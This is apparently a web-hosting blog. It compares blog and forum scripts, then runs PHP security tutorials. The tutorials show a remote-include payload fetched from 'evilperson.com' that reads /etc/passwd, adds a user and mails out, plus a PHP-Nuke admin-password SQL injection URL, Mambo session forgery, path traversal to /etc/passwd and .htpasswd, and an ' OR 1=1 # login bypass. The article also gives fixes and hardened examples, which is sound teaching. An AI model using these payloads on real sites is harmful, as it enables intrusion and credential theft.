Blog scripts hosting comparison: WordPress vs. b2evolution vs. MovableType
Posted: June 4, 2008 at 9:41 am |
(2) Comments
In the web hosting industry there are far more blog scripts than anyone could compare, so we have picked the most widely used, popular and properly maintained ones. Because a blog is easy to write, there are literally thousands of them; a blog is very often the first script a new PHP developer writes.
We review here the three most used blog scripts: WordPress, the industry leader at the moment; b2evolution, a well-known alternative that can double as a photo gallery and a content management system; and MovableType, another very professional blog script that is well suited to news-oriented sites because of its powerful editor and its expandability.
WordPress
b2\cafelog, more commonly known as simply b2 or cafelog, was the precursor to WordPress. b2\cafelog was estimated to have been employed on approximately 2,000 blogs as of May 2003. It was written in PHP for use with MySQL by Michel Valdrighi, who is now a contributing developer to WordPress. Though WordPress is the official successor, another project, b2evolution, is also in active development.
WordPress first appeared in 2003 as a joint effort between Matt Mullenweg and Mike Little to create a fork of b2.
In 2004 the licensing terms of the competing Movable Type package were changed by Six Apart, and many of its users migrated to WordPress, causing a marked and continuing growth in WordPress's popularity.
User friendliness: 5
WordPress is pretty much unmatched in user friendliness; an eight-year-old could configure it and start publishing posts. The hosting and installation procedure is very simple (the "famous 5-minute install"), and if you are not familiar with it, most cPanel web hosting companies offer WordPress hosting or a quick install through Fantastico that takes a few minutes. After installation, the administrator control panel is a well-designed two-tier navigation that gets right to the point: you just know where everything is supposed to be. WordPress has pushed user friendliness a long way without becoming bloated, and the new 2.5 administrator theme is certainly impressive.
Security: 3
Security is still a work in progress at WordPress. One study claimed that 98% of WordPress installs were vulnerable because of plugins: the plugin API is very simple, so everyone writes plugins, and many developers make mistakes that expose the site to all types of security problems. WordPress 2.0 was released in December 2005, and in the roughly three years since, WordPress itself has had around 30 serious vulnerabilities; with so many plugins around, every plugin you add increases the chance of weakening your site's security.
Reliability: 4.5
Most of the very popular blogs are hosted on WordPress, usually running a heavily modified version both to reduce security risks and to meet custom needs. GM has a few sites powered by WordPress that nobody would identify as WordPress, since practically no signs of it are left. Because it is so expandable, however, many sites end up creating their own "fork" of WordPress and stop following the official releases, which also means they stop receiving its security fixes.
b2evolution
b2evolution is a multi-lingual, multi-user, multi-blog publishing system written in PHP and backed by a MySQL database. It is distributed under the GNU General Public License and is available without charge. François Planque forked b2evolution from version 0.6.1 of b2\cafelog in 2003. Another popular fork of b2 is WordPress.
b2evolution is focused on ease of installation and feature richness. It can easily be installed on almost any LAMP (Linux, Apache, MySQL, PHP) host in a matter of minutes. With the latest release, no configuration file editing is necessary, as all configuration is handled through the installer or administrative back-end.
User friendliness: 3.5
b2evolution has tried to be very user friendly, but this is not its strong point. In the multi-blog, multi-user area it has a huge advantage, since it was built primarily for that purpose. The user interface, however, looks rather outdated and could use a facelift: everything is packed close together and looks cluttered, and the backend needs a lot of work to look more polished and presentable.
Security: 5
Here security ranks higher than usability: in its history b2evolution has had only 6 security issues, which earns it top marks. Its plugin interface was designed on the assumption that a plugin might be written by an inexperienced coder who could introduce SQL injection mistakes, so plugins are deliberately limited; that may have cost it some expandability, but the trade-off buys a very noticeable gain in security.
Reliability: 3.5
The reliability of b2evolution is not yet proven, since we do not see many sites using it at the moment. WordPress and other blog scripts have taken over the blog market, and hosted services such as WordPress.com and Google's Blogger seriously handicap b2evolution's ability to compete. A few sites still use it, but most have moved on.
MovableType
Movable Type was originally named “Serge” after musician Serge Gainsbourg. The TrackBack feature was introduced in version 2.2, and has since been adopted by a number of other blog systems.
With the release of version 3.0, there were marked changes in Movable Type’s licensing, most notably placing greater restrictions on its use without paying a licensing fee. This sparked criticism from some users of the software. With the release of Movable Type 3.2, the ability to create an unlimited number of weblogs at all licensing levels was restored. In Movable Type 3.3, it is completely free for personal users.
Six Apart released Movable Type 4 beta on June 5, 2007 and re-launched movabletype.org as a community site for purposes of developing an open-source version that was released under GPL on December 12, 2007. Movable Type Enterprise version provides advanced features such as LDAP management, enterprise database integration such as Oracle, MySQL, user roles, blog cloning and automated blog provisioning. It is also available as part of Intel’s SuiteTwo professional software offering of Web 2.0 tools.
User friendliness: 5
MovableType has come up with a very good control panel for managing your blog: from the same panel you can manage multiple blogs, identified by their domain names, and it uses a two-tier navigation with drop-down menus so that it feels like the interface of a desktop application. It looks very impressive, modern and professional.
Security: 4.5
MovableType has a very secure history, with only 4 security advisories in total, which is very impressive considering how popular it is. A main reason is that the 3.x versions were commercial software, so the code had to be solid enough to sell. Starting with 4.x, MovableType is completely open source, and since then participation and popularity have increased greatly.
Reliability: 3
MovableType is a very good alternative, but because it used to be commercial, people still have the image that it is paid software and do not consider it a valid option when picking their next blog script. Now that it is open source, its background as professional commercial software should turn into a big advantage and eventually make it a great application.
To sum up, MovableType is a great option for the future: WordPress has a big competitor that hardly anyone knows about yet, while b2evolution remains the choice for the multi-user, multi-blog market, which it has always led. With MovableType going from commercial to open source, the future of blog scripts looks very promising.
Free open-source forums showdown: phpBB vs SMF vs MyBB
Posted: May 25, 2008 at 10:48 pm |
(13) Comments
A lot of web hosting users are confused about which forum script to pick when creating their first community, since changing later is neither pleasant nor easy.
We compare the three most popular scripts on a few points: user friendliness, security and reliability, which are the most important considerations when picking a forum script. That one contender wins does not make it the best script out there; everyone's needs are different, and we compare them here only for a general audience.
phpBB
phpBB was first created by James Atkinson (theFinn) in June 2000 as a UBB-like forum solution for his wife. Once released to the public through SourceForge, it gained popularity very quickly, and by December of the same year v1.0.0 was released. Two additional major releases, 1.2 and 1.4, were made in February and April of 2001. During this time, the development team expanded to include Bart van Bragt (BartVB) and Paul S. Owen (psoTFX). Work on phpBB 2.0.x began in February of 2001. phpBB2 was built entirely from scratch, and took an entire year to complete.
Finally, in April of 2002, phpBB 2.0.0 was made available to the public. The 2.0.x line has since become the most successful open-source bulletin board software worldwide. Work on phpBB 2.2 started almost immediately and continued over the following years. On January 14, 2005, it was announced that phpBB 2.2 would be no more: because of the large-scale changes to the codebase and the lack of backwards compatibility with phpBB 2.0.x, it was decided that the next version would have to be 3.0.0, following the Linux kernel numbering convention. Thus phpBB3 "Olympus" was born.
User friendliness: 4.5
phpBB can be installed automatically through Fantastico at most web hosting providers with a couple of clicks, which is a big plus for user friendliness. The new prosilver theme shipped with phpBB 3 looks very impressive and far more professional than the one included in phpBB 2, and the administrative side has had a facelift that improves both looks and usability. Administrative control panels have always struggled with how to spread data sensibly across pages, and phpBB has found good ways around that. Starting with phpBB 3 it has also become much more of a plug-and-play forum, compared to the hours previously spent configuring it and hunting for a decent theme.
Security: 4
Security is a fairly strong point for phpBB: over the previous 7 years phpBB 2 had 38 security advisories, around 5 per year, which may sound high but is very low for the number of users it has. phpBB 3 seems to be going very strong: since its launch on 13 December 2007, around 6-7 months ago, it has had only 1 security advisory, which makes it very secure compared to other forum scripts.
Reliability: 5
phpBB runs the world's biggest online forum at the moment, Gaia Online, with 1,334,740,294 posts and over 12,589,038 members. The second biggest phpBB forum, a Brazilian games forum, has 102,704,207 posts and 167,802 members. The difference is huge, but hundreds of millions of posts on popular forums running phpBB without problems is certainly very impressive and gives phpBB top marks for reliability.
Overall score: 14/15
The final score for phpBB is very high, which is not surprising: according to a quick Google check it currently powers over 6,680,000 forums, largely because of its popularity and because it is very secure and reliable.
SMF
SMF was created to replace the forum software YaBB SE, which at the time was gaining a bad reputation because of problems with its Perl-based equivalent and similarly named software YaBB. YaBB was known to cause resource allocation problems and was resource heavy on many systems, in its earlier versions. YaBB SE was written as a rough PHP port of YaBB, but tended to have many of the same resource and even security problems since it was a port of the insecure Perl version. Joseph Fung and Jeff Lewis of Lewis Media Inc., the owners of YaBB SE and the original owners of SMF, made the decision to convert to a new brand and name.
SMF started as a small project by one of the YaBB SE developers and its main intent was to add more advanced templating to YaBB SE. The project then slowly grew to address common feature requests, efficiency problems, and security concerns. A rehaul of YaBB SE had been in development for several years, but was superseded by this then competing project. Popular interest in the new YaBB SE fork sparked a complete rewrite of the code, with security and performance in mind. This eventually became today’s Simple Machines Forum. The first SMF release was SMF 1.0 Beta 1a, released on 30 September 2003 to Charter Members only.
On the 23rd of October 2006, Simple Machines LLC was registered in the state of Arizona, and the transfer of copyrights from Lewis Media to Simple Machines LLC was completed on the 24th of November 2006 during a three-day retreat in Tucson, AZ. This was done for the “[solidification of] the team’s commitment to continuously providing free software, without the perceived risks of corporate influence”
User friendliness: 3.5
Of the three forums, SMF gets the least credit for user friendliness: the user interface it comes with is very old and looks outdated, and it has stayed the same for quite a few years with no facelift at all. The administrator panel is more crowded and harder to understand than in the other scripts. The initial score was 3, but one neat feature earns it an extra half point: the web installer. Instead of having to download, uncompress, upload and install, you download one PHP file that does all of that. It is very convenient, but the UI still needs a lot of work to be on par. Another plus is that it can be installed automatically through Fantastico with a couple of clicks.
Security: 5
SMF may not take the prize for user friendliness, but it steals it on security: in the past 4 years it has had only 7 security advisories, around 2 per year, a big difference from the other forums. The core code is very secure, which makes it a very good forum on the backend. Since it is not updated often, however, a low count of advisories is not surprising for a stable, rarely touched product.
Reliability: 4
SMF is not popular among big forums; the biggest forum hosted on SMF at the moment has 4,358,549 posts and 30,795 members. It is not very popular, but it is secure, which is why its reliability marks are fairly high. It also integrates well with Joomla, which makes it one of the more popular choices for Joomla users, and it is used on the Joomla support forum.
Overall score: 12.5/15
The overall score for SMF is as expected: it has a lot of work to do feature-wise, but it is very impressive on security and could well become a reliable forum script. It would be a good fit for a public forum with minimal features but maximum security.
MyBB
MyBB’s roots lie in the discussion boards XMB and DevBB — Years ago, Chris Boulton, web34rk and b0ndman started developing XMB. After some time, web34rk and b0ndman left the team and Chris became lead developer of a team with two other developers. Over time, staff shifted again and several developers didn’t like the way things were heading. Together, they forked XMB and created DevBB. DevBB was the predecessor to MyBB, a temporary solution for people to use whilst MyBB was being developed. Development teams changed frequently, but MyBB is still here with Chris Boulton as lead developer since 2002.
User friendliness: 4.5
MyBB's user friendliness is very good, considering that it is a new player in the free forum game. It has been evolving fast and taking over the forum market quickly because of its simple, down-to-earth setup and configuration: it makes managing your forum much simpler while still offering the advanced management features found in other good scripts, including paid ones. A small minus is that it cannot be installed automatically through Fantastico.
Security: 3.5
Security is a major issue with MyBB. It is generally secure but needs a lot more work: it had 34 security advisories in the past 4 years, around 9 per year, which is very high. It is still a new script with a lot of work ahead of it, and the more work that goes into it the more stable it should become; I would not be surprised if the initial versions of the other forums had as many exploits. MyBB does have a history of fixing security issues quickly and informing its users.
Reliability: 4
MyBB is very reliable because of how quickly it is updated, and it is slowly being adopted by big forums. One of the big forums running MyBB, dedicated to NCAA college sports, has over 3 million posts and 30 thousand members, and a couple more forums with 100K posts are coming up. Upcoming versions of MyBB also support clustered MySQL database setups, a big advantage for hosting big forums.
Overall score: 12/15
MyBB is still a work in progress, and the upcoming 1.4 release might, and should, change a lot. Its current status is very good, and the project seems to be on the right track, following in the footsteps of the other popular scripts.
Conclusion
To conclude, our winner is phpBB, by far the best for the current time: it has been working for years with no problems, and the release of phpBB 3 separates it from the competition by far. MyBB is coming up well with its 1.4 release, and SMF is still focused on being the very secure forum script.
Secure programming habits in PHP
Posted: November 4, 2006 at 4:27 pm |
(8) Comments
The goal of this article is to show common threats and challenges of programming secure PHP applications. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really conscious about what is going behind the curtains. Security and convenience do not often go hand in hand — but they can.
PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.
A site I will not mention in this article (because the problem has still not been fixed) has a script that includes various HTML files and displays them in the proper layout. Have a look at the following URL:
http://example.com/page.php?i=contact.html
The variable $i obviously contains the file name to be included. When you see a URL like this, a lot of questions should come to mind:
- Has the programmer considered directory traversals like i=../../../etc/passwd?
- Does he check for the .html extension?
- Does he use fopen() to include the files?
- Has he thought about not allowing remote files?
In this case, every answer was negative. Time to play! It is now possible to read every file the httpd user has read access to. Even more exciting is the fact that include() is used to pull in the HTML file. Consider this:
http://example.com/page.php?i=http://evilperson.com/badscript.html
where badscript.html contains a couple of lines of code:
<?php
passthru ('cat /etc/passwd');
passthru ('useradd myuser -p password');
passthru ('echo another hacked server! | mail hacker@internet.com');
?>
I am sure you get the idea. A lot of bad things can be done from here.
By default, PHP writes most variables into the global scope. Of course, this is very convenient. On the other hand, you can get lost in large scripts very quickly: where did that variable come from? If it is not set, where could it come from? All EGPCS (Environment, GET, POST, Cookie and Server) variables are put into the global scope.
The global associative arrays $HTTP_ENV_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS and $HTTP_SESSION_VARS will be created when the configuration directive track_vars is set. This allows you to look for a variable only in the place you expect it to come from. Note: As of PHP 4.0.3, track_vars is always turned on.
This security hole was reported to the Bugtraq mailing list by Ismael Peinado Palomo on July 25th, 2001. Mambo Site Server 3.0.x, a dynamic portal engine and content management tool based on PHP and MySQL, is vulnerable to a typical global-scope exploit. The code below has been modified and simplified.
Under the ‘admin/’ directory, index.php checks whether the password matches the one in the database after posting the form:
<?php
if ($row['pass'] == $postedpass) {
session_register("name");
session_register("fullname");
session_register("id");
header("Location: index2.php");
}
?>
When the passwords match, the variables $name, $fullname and $id are registered as session variables. The user then gets redirected to index2.php. Let us see what happens there:
<?php
if (!$PHPSESSID) {
header("Location: index.php");
exit(0);
} else {
session_start();
if (!$name) session_register("name");
if (!$fullname) session_register("fullname");
if (!$id) session_register("id");
}
?>
If the session ID has not been set, the user is redirected back to the login screen. If there is a session ID, the script resumes the session and puts the previously set session variables into the global scope. Nice. Let us see how we can exploit this. Consider the following URL:
http://example.com/admin/index2.php?PHPSESSID=1&name=admin&fullname=brian&id=admin
The GET variables $PHPSESSID, $name, $fullname and $id are created as global variables by default. Looking at the if-else structure above, the script sees that $PHPSESSID is set, and the three variables meant to authorize and identify the user can be set to anything you want. The database has not even been queried. A quick fix for this problem, by no means a perfect one, would be to check $HTTP_SESSION_VARS['id'] or $_SESSION['id'] (PHP >= 4.1.0) instead of $id.
Programming in PHP would be boring without a decent SQL database connected to the web server. However, assembling SQL queries with unchecked variables is a dangerous thing to do.
The following bug in PHP-Nuke 5.x was reported to the Bugtraq mailing list on August 3, 2001. It is a combination of exploiting global variables and an unchecked variable in an SQL query.
The PHP-Nuke developers decided to add the "nuke" prefix to all tables to avoid conflicts with other scripts. The prefix can be changed when multiple Nuke sites share one database. By default, $prefix = "nuke"; is defined in the configuration file config.php.
Let us now look at a few lines from the script article.php.
<?php
if (!isset($mainfile)) {
include("mainfile.php");
}
if (!isset($sid) && !isset($tid)) {
exit();
}
?>
And a bit further down: the SQL query.
<?php
mysql_query("UPDATE " . $prefix . "_stories SET counter=counter+1 where sid=$sid");
?>
To change the SQL query we need to make sure $prefix is not set to its default value, so that we can supply an arbitrary value via GET. The configuration file config.php is included from mainfile.php. As we know from the last chapter, we can set the variables $mainfile, $sid and $tid to any value using GET parameters; if we do, the script thinks mainfile.php has already been included and that $prefix has been set accordingly. Now we are in a position to execute any SQL query starting with UPDATE. The following request sets all admin passwords to '1':
http://phpnukesite.com/article.php?mainfile=1&sid=1&tid=1&prefix=nuke.nuke_authors%20set%20pwd=1%23
The query now looks like this:
UPDATE nuke.nuke_authors set pwd=1#_stories SET counter=counter+1 where sid=1
Of course, everything after # is treated as a comment and ignored, so only UPDATE nuke.nuke_authors set pwd=1 is executed.
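The fix this write-up points at, as an added example that is not PHP-Nuke's own code: the prefix comes from a constant the request cannot override, the table name is allowlisted before it is concatenated (a table identifier cannot be bound as a query parameter), and sid is validated as an integer and bound. PDO with an in-memory SQLite database stands in for MySQL so the script runs offline; the table layout and rows are constructed for the demo.

```php
<?php
// Added example, not PHP-Nuke's own article.php. Hardened version of the
// UPDATE shown above. SQLite (via PDO) stands in for MySQL; tables and rows
// are constructed for the demo.
declare(strict_types=1);

// From config.php. A constant cannot be overwritten by ?prefix=..., and the
// config is included unconditionally rather than guarded by isset($mainfile).
const TABLE_PREFIX = 'nuke';

// A table name cannot be bound as a query parameter, so the only safe way to
// build one from pieces is to allowlist its characters and quote it.
function table(string $suffix): string
{
    $name = TABLE_PREFIX . '_' . $suffix;
    if (!preg_match('/\A[A-Za-z][A-Za-z0-9_]*\z/', $name)) {
        throw new InvalidArgumentException("bad table name: $name");
    }
    return '`' . $name . '`';
}

// $sid arrives as a string from $_GET. FILTER_VALIDATE_INT rejects "1 OR 1=1",
// "1#" and ""; a plain (int) cast would silently turn "1 OR 1=1" into 1.
function bump_counter(PDO $db, string $sid): int
{
    $id = filter_var($sid, FILTER_VALIDATE_INT);
    if ($id === false) {
        throw new InvalidArgumentException('sid must be an integer');
    }
    $stmt = $db->prepare('UPDATE ' . table('stories') . ' SET counter = counter + 1 WHERE sid = :sid');
    $stmt->execute([':sid' => $id]);
    return $stmt->rowCount();
}

// --- demo with constructed data ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE `nuke_stories` (sid INTEGER PRIMARY KEY, counter INTEGER NOT NULL DEFAULT 0)');
$db->exec('CREATE TABLE `nuke_authors` (aid TEXT PRIMARY KEY, pwd TEXT NOT NULL)');
$db->exec('INSERT INTO `nuke_stories` (sid) VALUES (1), (2)');
$db->exec("INSERT INTO `nuke_authors` VALUES ('god', 'original-hash')");

echo 'rows updated for ?sid=1: ', bump_counter($db, '1'), "\n";
echo 'counter is now ', $db->query('SELECT counter FROM `nuke_stories` WHERE sid = 1')->fetchColumn(), "\n";

// Payloads in the spirit of the write-up are rejected before any SQL is built.
foreach (['1 OR 1=1', '1; UPDATE nuke_authors SET pwd=1', '1#'] as $bad) {
    try {
        bump_counter($db, $bad);
    } catch (InvalidArgumentException $e) {
        echo "rejected '$bad': ", $e->getMessage(), "\n";
    }
}
echo 'admin password still ', $db->query('SELECT pwd FROM `nuke_authors`')->fetchColumn(), "\n";
```

Run it with `php` on the command line; it needs the pdo_sqlite extension. The counter for sid=1 ends at 1, the three bad values never reach the database, and the authors row is unchanged. The point of the constant is that the exploit above depended on two request variables ($mainfile and $prefix) that were only ever meant to be set by the application's own files.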
More to come. 
PHP Security Tips
Posted: September 24, 2006 at 4:31 pm |
(2) Comments
PHP is a very easy language to learn, and many people without much programming knowledge pick it up to make their sites more interactive. Unfortunately, a large share of them are unaware of the security risks. Here are the most common ones:
Never trust any users on your site
Never, Ever, Trust Your Users. Assume every single piece of data your site collects from a user contains malicious code. Always. That includes data you think you have checked with client-side validation, for example using JavaScript. If you can manage that, you’ll be off to a good start. If PHP security is important to you, this single point is the most important to learn.
register_globals
If you are an advanced PHP programmer you most probably know about this. register_globals turns every variable that comes into the script into a global variable (for example, if my page is index.php and a visitor requests index.php?p=3, my variable $p is 3).
if ($password == "mypassword") {
$authorized = 1;
}
if ($authorized == 1) {
echo "my important area";
}
If your server or PHP install has register_globals on, anyone requesting page.php?authorized=1 gains access to it.
There are two ways to fix a problem like this:
1. Create a .htaccess file and put the following in it: php_flag register_globals off. Take note, however, that if you coded your script in an environment with register_globals on (that is, without using $_POST, $_GET or $_REQUEST), this will break your script.
2. Simply assign $authorized = 0; before you use the variable, so that even if someone tries ?authorized=1 the value is overwritten before the check.
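The Mambo index.php/index2.php case from the "Secure programming habits" post above and the $authorized check here share one root cause, so this single added example (not code from either post) covers both: a login step that reads only from the POST array and initialises its result before use, and a protected page that takes identity from $_SESSION and nothing else, so it behaves the same whether register_globals is on or off. The user table, the password and the page wiring are constructed for the demo.

```php
<?php
// Added example, not code from either post. A login check and a protected
// page that stay correct whether or not register_globals is on: every input
// is read from the superglobal it is expected in, every decision variable is
// initialised before use, and identity lives only in $_SESSION. The user
// table and password are constructed for the demo.
declare(strict_types=1);

// Stand-in for the database row the Mambo code compares against.
function users(): array
{
    static $users = null;
    if ($users === null) {
        $users = [
            'admin' => ['id' => 1, 'fullname' => 'Site Administrator',
                        'hash' => password_hash('correct horse', PASSWORD_DEFAULT)],
        ];
    }
    return $users;
}

// Login step (index.php). Takes the POST array explicitly; $authorized starts
// out empty, so a request carrying ?authorized=1 or ?id=admin changes nothing.
function authenticate(array $post): ?array
{
    $authorized = null;
    $name = (string)($post['name'] ?? '');
    $pass = (string)($post['password'] ?? '');
    $user = users()[$name] ?? null;
    if ($user !== null && password_verify($pass, $user['hash'])) {
        $authorized = ['id' => $user['id'], 'name' => $name, 'fullname' => $user['fullname']];
    }
    return $authorized;
}

// Protected page (index2.php). Reads the session array only, never $id/$name
// from the request, and never session_register()s a request variable.
function current_user(array $session): ?array
{
    if (!isset($session['id'], $session['name'])) {
        return null;
    }
    return ['id' => (int)$session['id'], 'name' => (string)$session['name']];
}

if (PHP_SAPI !== 'cli') {
    // Web wiring (both pages in one file for brevity): session_start() before
    // anything is read from $_SESSION, and a fresh session ID once the user
    // is authenticated so a PHPSESSID chosen by the client is not kept.
    session_start();
    if (isset($_POST['name']) && ($u = authenticate($_POST)) !== null) {
        session_regenerate_id(true);
        $_SESSION = $u;
        header('Location: index2.php');
        exit;
    }
    if (current_user($_SESSION) === null) {
        header('Location: index.php');
        exit;
    }
} else {
    // CLI demo. The forged request from the Mambo write-up,
    // index2.php?PHPSESSID=1&name=admin&fullname=brian&id=admin,
    // never reaches $_SESSION, so the protected page sees no user.
    var_dump(current_user([]));                                                     // NULL
    var_dump(authenticate(['name' => 'admin', 'password' => 'wrong']));             // NULL
    var_dump(authenticate(['name' => 'admin', 'password' => 'correct horse'])['id']); // int(1)
}
```

Nothing here depends on the php_flag setting: with register_globals on, the request still creates a global $id, but no code path ever reads it, and the session array is only ever written from the result of a successful password check.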
Error Messages
Errors are a very useful tool for both the programmer and the attacker. A developer needs them to fix bugs; an attacker can use them to learn all sorts of things about a site, from the directory structure of the server to database login information. If possible, turn off the display of errors in a live application. PHP can be told to do this through .htaccess or php.ini by setting error_reporting to 0, or by calling error_reporting(0); at the beginning of your script. Better still, keep error_reporting on but set display_errors to Off and log_errors to On, so that errors go to the server log where you can read them and the visitor sees nothing. If you have a development environment, you can use a different error reporting level there.
SQL Injection
One of PHP’s greatest strengths is the ease with which it can communicate with databases, most notably MySQL. Many people make extensive use of this, and a great many sites, rely on databases to function.
However, as you would expect, with that much power come potentially huge security problems. Fortunately, there are plenty of solutions. The most common hazard when interacting with a database is SQL injection: a user exploits a flaw in your code to run their own SQL queries on your database.
Let’s use a common example. Many login systems feature a line that looks a lot like this when checking the username and password entered into a form by a user against a database of valid username and password combinations, for example to control access to an administration area:
$check = mysql_query("SELECT Username, Password, UserLevel FROM Users WHERE Username = '".$_POST['username']."' and Password = '".$_POST['password']."'");
If I enter the following into the "username" input box in the form and submit it:
' OR 1=1 #
The query that is going to be executed will now look like this:
SELECT Username, Password, UserLevel FROM Users WHERE Username = '' OR 1=1 #' and Password = ''
The hash symbol (#) tells MySQL that everything following it is a comment and to ignore it. So it will actually only execute the SQL up to that point. As 1 always equals 1, the SQL will return all of the usernames and passwords from the database. And as the first username and password combination in most user login databases is the admin user, the person who simply entered a few symbols in a username box is now logged in as your website administrator, with the same powers they would have if they actually knew the username and password.
With a little creativity, the above can be exploited further, allowing a user to create their own login account, read credit card numbers or even wipe a database clean.
Fortunately, this type of vulnerability is easy enough to work around. By checking for apostrophes in the data we pass to the database and neutralizing them, we can prevent anyone from running their own SQL on it. The function below does the trick for values placed inside quoted string literals; note that addslashes() is not aware of the connection's character set, so mysql_real_escape_string() (or, better, prepared statements) is the preferred choice today:
function make_safe($variable) {
$variable = addslashes(trim($variable));
return $variable;
}
Instead of using _POST variables as in the query above, we now run all user data through the make_safe function, resulting in the following code:
$username = make_safe($_POST['username']);
$password = make_safe($_POST['password']);
$check = mysql_query("SELECT Username, Password, UserLevel FROM Users
WHERE Username = '".$username."' and Password = '".$password."'");
If a user entered the malicious data above, the query would look like the following, which is perfectly harmless: it selects from the database where the username equals \' OR 1=1 #.
SELECT Username, Password, UserLevel FROM Users WHERE Username = '\' OR 1=1 #' and Password = ''
Unless you happen to have a user with that very unusual username and a blank password, the attacker cannot do any damage. It is important to check all data passed to your database like this, however trustworthy you think it is: HTTP headers sent by the user can be faked, the referrer can be faked, the browser's User-Agent string can be faked.
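The login check above, run for real against a database, as an added example that is not from Dave Child's article: the query is built once by string concatenation as in the article and once with bound parameters, and a third query shows the case escaping does not cover, a value compared without surrounding quotes. PDO with an in-memory SQLite database stands in for MySQL so it runs offline; SQLite comments start with -- rather than MySQL's #, so the payload is adjusted accordingly, and the user rows are constructed for the demo.

```php
<?php
// Added example, not from the original article. Runs the article's login
// query against in-memory SQLite via PDO, concatenated and then prepared,
// and shows a numeric context where addslashes() does not help. Rows and
// plaintext passwords are constructed only to mirror the article's query;
// real code stores hashes (password_hash/password_verify).
declare(strict_types=1);

function setup(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE Users (ID INTEGER PRIMARY KEY, Username TEXT, Password TEXT, UserLevel INTEGER)');
    $db->exec("INSERT INTO Users VALUES (1, 'admin', 'hunter2', 9), (2, 'alice', 'wonderland', 1)");
    return $db;
}

// The article's query as written: user input interpolated into the SQL text.
function login_vulnerable(PDO $db, string $user, string $pass): array
{
    $sql = "SELECT Username, Password, UserLevel FROM Users WHERE Username = '" . $user
         . "' and Password = '" . $pass . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Same check with placeholders: the driver sends values separately from the
// SQL text, so quotes and comment markers inside them are just data.
function login_safe(PDO $db, string $user, string $pass): array
{
    $stmt = $db->prepare('SELECT Username, Password, UserLevel FROM Users WHERE Username = ? AND Password = ?');
    $stmt->execute([$user, $pass]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// addslashes() only protects a value inside a quoted string literal. A numeric
// column compared without quotes is still injectable after escaping.
function user_by_id_escaped(PDO $db, string $id): array
{
    $sql = 'SELECT Username FROM Users WHERE ID = ' . addslashes($id);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

$db = setup();
$payload = "' OR 1=1 --";   // the article's payload with SQLite's comment marker

echo count(login_vulnerable($db, $payload, '')), " rows from the concatenated query\n";  // 2: every user
echo count(login_safe($db, $payload, '')), " rows from the prepared statement\n";        // 0
echo count(login_safe($db, 'admin', 'hunter2')), " row for the real credentials\n";      // 1
echo implode(',', user_by_id_escaped($db, '1 OR 1=1')), " <- addslashes() did not help\n"; // admin,alice
```

The first line prints 2 because the WHERE clause has collapsed to Username = '' OR 1=1; the prepared statement returns nothing for the same input, and the last line returns both users because there was never a quote for addslashes() to escape. Prepared statements remove the whole class of problem for values; identifiers (table or column names) still need an allowlist.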
File Manipulation
Some sites currently running on the web today have URLs that look like this:
index.php?page=contactus.html
The index.php file then simply includes the contactus.html file, and the site appears to work. But the user can very easily change the contactus.html part to anything they like. For example, if you use Apache's mod_auth to protect files and have stored your passwords in a file named .htpasswd (the conventional name), then a user visiting the following address would have the script output your usernames and password hashes:
index.php?page=.htpasswd
By changing the URL to reference a file on another server, on some systems they could even run PHP they have written on your site. Fortunately, this is also reasonably easy to protect against. First, make sure you have correctly set open_basedir in your php.ini and have set allow_url_fopen to off (PHP 5.2 and later also has a separate allow_url_include directive, which should be off as well). That prevents most of these attacks by blocking the inclusion of remote files and system files. Next, if you can, check the requested file against a list of valid files. If you limit the files this script can access, you will save yourself a lot of aggravation later.
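The page.php?i=... script from the "Secure programming habits" post and the index.php?page=... script here are the same bug, so this one added example (not code from either post) serves both: the requested name must be a plain .html file name that resolves inside one fixed directory, which rejects traversal, dotfiles such as .htpasswd and URLs regardless of the php.ini settings (which remain worth setting as a second layer), and the file is read out rather than include()d so it can never execute as PHP. The directory, files and probe values are constructed in a temporary directory so the script runs stand-alone.

```php
<?php
// Added example, not code from either post. A hardened replacement for
// page.php?i=... / index.php?page=... that serves static HTML from one
// directory. Files and probes are constructed in a temp dir for the demo.
declare(strict_types=1);

function resolve_page(string $base, string $requested): ?string
{
    // Only plain names: letters, digits, dash, underscore, then ".html".
    // This alone excludes "/", "..", ":", a leading dot and embedded NULs.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.html\z/', $requested)) {
        return null;
    }
    $baseReal = realpath($base);
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    // realpath() returns false for missing files and follows symlinks, so a
    // link pointing outside $base fails the prefix check below.
    if ($baseReal === false || $target === false) {
        return null;
    }
    if (strncmp($target, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        return null;
    }
    return $target;
}

function render_page(string $base, string $requested): string
{
    $path = resolve_page($base, $requested);
    if ($path === null) {
        return "not found\n";   // a real handler would also send a 404 status
    }
    // readfile(), not include(): static HTML must never be executed as PHP.
    ob_start();
    readfile($path);
    return (string)ob_get_clean();
}

// --- demo with constructed files ---
$base = sys_get_temp_dir() . '/pages_' . bin2hex(random_bytes(4));
mkdir($base);
file_put_contents("$base/contact.html", "<h1>Contact</h1>\n");
file_put_contents("$base/.htpasswd", "admin:\$apr1\$fake\n");

$probes = [
    'contact.html',                          // legitimate
    '../../../etc/passwd',                   // traversal
    'http://evilperson.com/badscript.html',  // remote include
    '.htpasswd',                             // dotfile in the same directory
    "contact.html\0",                        // what ?i=contact.html%00 decodes to
];
foreach ($probes as $p) {
    printf("%-40s -> %s", addcslashes($p, "\0"), render_page($base, $p));
}
// Only contact.html is served; every other line reads "not found".

unlink("$base/contact.html");
unlink("$base/.htpasswd");
rmdir($base);
```

The character allowlist does most of the work; the realpath() prefix comparison is the belt to that pair of braces, catching a symlink inside the pages directory that points elsewhere. If the set of pages is small and fixed, a literal array of allowed names, as the paragraph above suggests, is simpler still.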
Using Defaults
